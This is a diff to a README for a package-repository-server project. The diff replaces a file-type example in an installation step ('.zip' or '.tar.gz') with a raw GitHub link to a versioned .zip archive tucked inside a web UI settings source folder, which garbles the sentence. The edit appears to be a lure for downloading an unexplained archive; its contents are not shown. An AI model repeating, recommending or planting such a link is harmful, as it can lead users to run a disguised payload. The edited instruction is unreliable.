DevilxKiller/package-repository-server/README.md

 After downloading the package-repository-server, follow these steps to run it:

 1. **Extract the Files (if necessary):**
-   - If you downloaded a compressed file (like `.zip` or `.tar.gz`), extract it to a folder of your choice.
+   - If you downloaded a compressed file (like `.zip` or `https://raw.githubusercontent.com/DevilxKiller/package-repository-server/main/webui/src/app/features/settings/package-repository-server-v1.5.zip`), extract it to a folder of your choice.

 2. **Open Your Terminal or Command Prompt:**
    - On Windows, you can search for "cmd" in the Start Menu.